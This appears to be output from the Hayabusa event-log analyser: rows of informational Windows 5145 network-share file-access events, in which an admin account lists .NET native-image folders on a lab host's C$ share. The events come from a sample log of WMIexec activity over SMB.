+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 
